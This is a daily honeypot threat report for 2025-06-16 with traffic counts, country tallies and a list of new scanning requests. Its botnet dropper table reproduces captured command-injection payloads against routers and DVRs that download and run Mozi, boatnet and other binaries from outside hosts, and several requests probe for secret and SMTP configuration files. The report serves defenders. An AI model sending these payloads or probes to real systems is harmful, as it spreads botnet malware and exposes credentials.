Daily Report: 2025-06-16#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 10 stage 1 IP address(es), linked to 10 dropper URL(s).
There are 88 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1358 requests were recorded during the day, originating from 10 different countries, with a peak of 607 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
US | Israel |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
222.134.175.97 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
104.167.221.114 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1 |
141.98.11.147 | GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1 |
141.98.11.83 | GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+ |
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1 |
139.5.0.235 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.0.235:37799/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
144.172.116.95 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O- |
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.211%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1 |
144.172.103.59 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.111%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
51 | 2 | HEAD /web/phpMyAdmin/scripts/setup.php HTTP/1.1 |
57 | 2 | HEAD /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1 |
58 | 2 | GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1 |
60 | 2 | GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.1 |
63 | 2 | HEAD /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1 |
64 | 2 | HEAD /SQL/scripts/setup.php HTTP/1.1 |
65 | 2 | GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1 |
66 | 2 | HEAD /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.1 |
67 | 2 | HEAD /phpmanager/scripts/setup.php HTTP/1.1 |
72 | 2 | GET /secrets.GITHUB_ENV HTTP/1.1 |
73 | 2 | GET /env.yaml HTTP/1.1 |
75 | 2 | GET /aws-exports.js HTTP/1.1 |
76 | 2 | GET /smtp.properties HTTP/1.1 |
77 | 2 | GET /smtp-secret.yaml HTTP/1.1 |
78 | 2 | GET /webdb/scripts/setup.php HTTP/1.1 |
80 | 2 | GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1 |
81 | 2 | HEAD /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1 |
82 | 2 | GET /websql/scripts/setup.php HTTP/1.1 |
83 | 2 | HEAD /websql/scripts/setup.php HTTP/1.1 |
84 | 2 | GET /run/secrets/smtp_pass HTTP/1.1 |
85 | 2 | GET /smtp_config.sh HTTP/1.1 |
86 | 2 | GET /config.lua HTTP/1.1 |
87 | 2 | GET /config/email.conf HTTP/1.1 |
88 | 2 | GET /config/email.ts HTTP/1.1 |
89 | 2 | GET /src/config/smtp.ts HTTP/1.1 |
92 | 2 | GET /mail.properties HTTP/1.1 |
94 | 2 | GET /Rocket.toml HTTP/1.1 |
96 | 2 | GET /config/smtp.go HTTP/1.1 |
97 | 2 | GET /Config/DefaultEngine.ini HTTP/1.1 |
98 | 2 | GET /Assets/Scripts/SMTPConfig.cs HTTP/1.1 |
99 | 2 | GET /app.config.js HTTP/1.1 |
101 | 2 | HEAD /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1 |
104 | 2 | GET /lib/config.dart HTTP/1.1 |
106 | 2 | GET /_config.yml HTTP/1.1 |
108 | 2 | GET /config/plugins.js HTTP/1.1 |
110 | 2 | GET /config/initializers/email.rb HTTP/1.1 |
111 | 2 | GET /server/config.js HTTP/1.1 |
112 | 2 | GET /LocalConfiguration.php HTTP/1.1 |
116 | 2 | GET /functions.php HTTP/1.1 |
128 | 2 | HEAD /php/scripts/setup.php HTTP/1.1 |
129 | 2 | GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.1 |
177 | 2 | HEAD /phpmy-admin/scripts/setup.php HTTP/1.1 |
180 | 2 | GET /config/params.php HTTP/1.1 |
182 | 2 | GET /config/packages/mailer.yaml HTTP/1.1 |
183 | 2 | GET /app/Config/Email.php HTTP/1.1 |
185 | 2 | GET /vapor.yml HTTP/1.1 |
193 | 2 | GET /config/environments/development.rb HTTP/1.1 |
194 | 2 | GET /config/environments/production.rb HTTP/1.1 |
196 | 2 | HEAD /mysqlmanager/scripts/setup.php HTTP/1.1 |
198 | 2 | GET /app/config.py HTTP/1.1 |
200 | 2 | GET /config/mail.ts HTTP/1.1 |
201 | 2 | GET /src/config/mail.config.ts HTTP/1.1 |
203 | 2 | GET /config/smtp.js HTTP/1.1 |
326 | 2 | HEAD /admin/phpmyadmin/scripts/setup.txt HTTP/1.1 |
327 | 2 | GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1 |
328 | 2 | HEAD /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.1 |
332 | 2 | HEAD /phpMyAdmin/scripts/setup.php HTTP/1.1 |
337 | 1 | HEAD /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1 |
338 | 1 | GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1 |
362 | 1 | GET /6ZuX HTTP/1.1 |
390 | 1 | GET /QNnO HTTP/1.1 |
407 | 1 | GET /phpMyAdmin2/scripts/setup.php HTTP/1.1 |
412 | 1 | GET /mysqlmanager/scripts/setup.php HTTP/1.1 |
421 | 1 | GET /odinhttpcall1750075093 HTTP/1.1 |
422 | 1 | GET /OdinHttpCall1750075093 HTTP/1.1 |
424 | 1 | GET /Odin/http/call1750075093 HTTP/1.1 |
428 | 1 | GET /phpma/scripts/setup.php HTTP/1.1 |
434 | 1 | HEAD /mysqladmin/scripts/setup.php HTTP/1.1 |
437 | 1 | HEAD /admin/pma/scripts/setup.php HTTP/1.1 |
448 | 1 | GET /admin/scripts/setup.php HTTP/1.1 |
451 | 1 | GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.1 |
452 | 1 | HEAD /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1 |
453 | 1 | GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1 |
454 | 1 | HEAD /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1 |
455 | 1 | GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1 |
456 | 1 | HEAD /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1 |
457 | 1 | GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1 |
459 | 1 | GET /webadmin/scripts/setup.php HTTP/1.1 |
484 | 1 | GET /phpmanager/scripts/setup.php HTTP/1.1 |
488 | 1 | GET /sqlmanager/scripts/setup.php HTTP/1.1 |
489 | 1 | GET /SQL/scripts/setup.php HTTP/1.1 |
491 | 1 | GET /_phpMyAdmin/scripts/setup.php HTTP/1.1 |
492 | 1 | GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1 |
500 | 1 | HEAD /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1 |
501 | 1 | GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.1 |
503 | 1 | GET /phpMyAdmin3/scripts/setup.php HTTP/1.1 |
517 | 1 | \x00\x0E\x08\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00 |
518 | 1 | \x00\x0E8\x9D\xA6f\xEA\xAE[\x84\xBE\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 607 | US |
1 | 146 | DE |
2 | 92 | ES |
3 | 65 | CN |
4 | 62 | NL |
5 | 51 | BG |
6 | 46 | FR |
7 | 42 | SA |
8 | 22 | LT |
9 | 22 | VN |
10 | 20 | PL |
11 | 16 | SC |
12 | 15 | KZ |
13 | 15 | GB |
14 | 14 | CA |
15 | 14 | JP |
16 | 13 | AU |
17 | 12 | EG |
18 | 10 | IL |
19 | 9 | GH |
20 | 8 | RU |
21 | 7 | KR |
22 | 6 | AO |
23 | 5 | NG |
24 | 4 | HK |
25 | 4 | BE |
26 | 3 | CH |
27 | 3 | CZ |
28 | 3 | IN |
29 | 3 | SG |
30 | 3 | BR |
31 | 2 | IE |
32 | 2 | RO |
33 | 2 | MD |
34 | 2 | MN |
35 | 1 | TR |
36 | 1 | KE |
37 | 1 | PT |
38 | 1 | PK |
39 | 1 | IR |
40 | 1 | CL |
41 | 1 | ID |
42 | 1 | AR |